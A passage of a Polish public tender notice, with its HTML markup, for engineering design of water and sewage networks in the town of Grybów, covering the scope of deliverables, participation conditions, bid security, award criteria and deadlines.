ul. Czerwona Góra. W opracowaniu pn. ,,Analiza funkcjonowania oraz określenie zakresu, warunków i wymagań technicznych w celu poprawy sposobu działania systemu wodociągowo-kanalizacyjnego na terenie miasta Grybowa" cz. II system kanalizacyjny - str. 18, została przeprowadzona analiza możliwości rezygnacji z przepompowni PsK1 na rzecz odcinka kanalizacji grawitacyjnej. 3.1.6.6. Opracowanie raportu wpływu na środowisko zgodnie z wymogami ustawowymi jeśli jest to konieczne. 3.1.6.7. Wykonanie innych opracowań projektowych, w przypadku takiej konieczności, jak: operaty wodno-prawne, projekty przepompowni ścieków i wody, projekty przyłączy energetycznych, uzyskanie warunków przyłączenia zasilanie energetycznego, projekty odbudowy dróg, potoków, przełożenia w razie potrzeby sieci energetycznych, gazowych wod-kan itp. 3.1.6.8. Sporządzenie Informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia. 3.1.6.9. Uzyskanie w imieniu Zamawiającego prawomocnego pozwolenia na budowę. 3.1.6.10. Opracowanie przedmiarów robót z podstawą wyceny i kosztorysów inwestorskich w zakresie i formie określonej w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. 3.1.6.11. Opracowanie specyfikacji technicznych wykonania i odbioru robót w zakresie i formie wymaganej w Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. 3.1.6.12. Wykonawca jest zobowiązany do przygotowania dla Zamawiającego wszelkich niezbędnych odpowiedzi na pytania wykonawców w ramach przetargu publicznego na wykonawstwo robót budowlanych zamawianych dotyczących Dokumentacji opracowanej przez Wykonawcę. 3.1.6.13. Pełnienie nadzoru autorskiego wielobranżowego nad inwestycją wykonywaną w oparciu o dokumentację wymienioną powyżej. 3.1.6.14. Wykaz dokumentacji technicznej do odbioru dla części II: a) Mapy sytuacyjno-wysokościowe do celów projektowych w skali 1:500, które należy wykonać w formie papierowej (2 egz.) oraz w formie elektronicznej na płycie CD lub DVD. b) Projekty budowlane i projekty wykonawcze muszą spełniać wszelkie wymogi Prawa Budowlanego i przepisów z nim związanych oraz zawierać uzgodnienia i pozwolenia instytucji, właścicieli działek, przez które przebiegać będzie sieć kanalizacyjna i wodociągowa niezbędne do uzyskania pozwolenia na budowę. c) Pozwolenie na budowę na poszczególne zadania. d) Wszelkie inne pozwolenia i zgody niezbędne do realizacji poszczególnych zadań. e) Kosztorysy inwestorskie i przedmiary robót należy sporządzić: ? osobno dla sieci ? osobno dla przyłączy ? osobno dla urządzeń sieciowych i zasilania energetycznego f) W przedmiarach robót oraz kosztorysach należy wyspecyfikować szczegółowo odcinki sieci oraz poszczególne przyłącza. g) Należy sporządzić dokumentację w następującej ilości egzemplarzy: ? Projekty budowlane - w 5 egzemplarzach ? Projekty wykonawcze - w 5 egzemplarzach ? Pozostałe opracowania - w 3 egzemplarzach h) Całość dokumentacji należy również opracować w formie elektronicznej na płytach CD-w 2 egz. i) Wykonawca zobowiązany będzie ponadto przekazać całość dokumentacji w wersji elektronicznej plikach PDF i JPG oraz w formatach, w których zostały utworzone (np. Word, norma, autocad). 3.2. Zamawiający dopuszcza składanie ofert częściowych zgodnie z pkt 3.1.1 i 3.1.2. SIWZ. 3.3. Zamawiający informuje, że płatność będzie dokonana na rachunek Wykonawcy, wskazany na fakturze, w terminie 30 dni od złożenia prawidłowo wystawionej faktury jednak nie wcześniej niż: 3.3.1. Część I zamówienia - po 2 stycznia 2020 r. 3.3.2. Część II zamówienia - po 2 stycznia 2019 r. 3.4. Wspólny słownik zamówień (CPV): 3.4.1. 71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej. 3.5. Zamawiający na podstawie art. 29 ust. 3a ustawy wymaga zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz. U. z 2018 r. poz. 917). 3.6. Zamawiający ustala także: gdziekolwiek w Specyfikacji Istotnych Warunków Zamówienia oraz w załącznikach do Specyfikacji pojawia się znak towarowy, patent lub pochodzenie Zamawiający dopuszcza stosowanie rozwiązań równoważnych. Znaki towarowe, patenty lub pochodzenie powinny być uwzględniane jako definicje standardu a nie jako określone marki zastosowane w projekcie.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71322000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-11-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości:- Część I - 1 000,00 zł (tysiąc złotych zero groszy).- Część II - 1 000,00 zł (tysiąc złotych zero groszy).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>90,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności faktury</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-06-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> 